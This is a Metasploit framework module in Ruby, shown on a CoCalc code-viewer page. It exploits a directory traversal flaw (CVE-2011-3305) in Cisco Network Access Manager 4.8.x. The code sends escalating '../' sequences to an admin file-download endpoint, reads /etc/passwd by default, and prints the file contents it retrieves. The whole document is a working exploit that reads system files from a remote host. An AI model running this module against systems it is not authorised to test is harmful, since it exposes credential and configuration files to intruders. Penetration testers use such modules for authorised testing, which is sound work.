CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::HttpClient

8
  include Msf::Auxiliary::Scanner

9


10
  def initialize

11
    super(

12
      'Name'           => 'Cisco Network Access Manager Directory Traversal Vulnerability',

13
      'Description'    => %q{

14
        This module tests whether a directory traversal vulnerability is present

15
        in versions of Cisco Network Access Manager 4.8.x You may wish to change

16
        FILE (e.g. passwd or hosts), MAXDIRS and RPORT depending on your environment.

17
        },

18
      'References'     =>

19
        [

20
          [ 'CVE', '2011-3305' ],

21
          [ 'OSVDB', '76080']

22
        ],

23
      'Author'         => [ 'Nenad Stojanovski <nenad.stojanovski[at]gmail.com>' ],

24
      'License'        => MSF_LICENSE,

25
      'DefaultOptions' => {

26
        'SSL'          => true

27
      }

28
    )

29


30
    register_options(

31
      [

32
        Opt::RPORT(443),

33
        OptString.new('FILE', [ true, 'The file to traverse for', '/etc/passwd']),

34
        OptInt.new('MAXDIRS', [ true, 'The maximum directory depth to search', 7]),

35
      ])

36
  end

37


38
  def run_host(ip)

39


40
    traversal = '../../'

41
    part1= '/admin/file_download?tag='

42
    part2 = '&fileType=snapshot'

43


44
    begin

45
      print_status("Attempting to connect to #{rhost}:#{rport}")

46
      res = send_request_raw(

47
        {

48
          'method'  => 'GET',

49
          'uri'     => '/admin',

50
        }, 25)

51


52
      if (res)

53
        1.upto(datastore['MAXDIRS']) do |level|

54
          try = traversal * level

55
          traversalstring = part1 + try + datastore['FILE'] + part2

56
          res = send_request_raw(

57
            {

58
              'method'  => 'GET',

59
              'uri'     => traversalstring,

60
            }, 25)

61
          if (res and res.code == 200)

62
            print_status("Request ##{level} may have succeeded on #{rhost}:#{rport}!\r\n Response: \r\n#{res.body}")

63
            break

64
          elsif (res and res.code)

65
            print_error("Attempt ##{level} returned HTTP error #{res.code} on #{rhost}:#{rport}\r\n")

66
          end

67
        end

68
      end

69


70
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout

71
    rescue ::Timeout::Error, ::Errno::EPIPE

72
    end

73
  end

74
end

75


76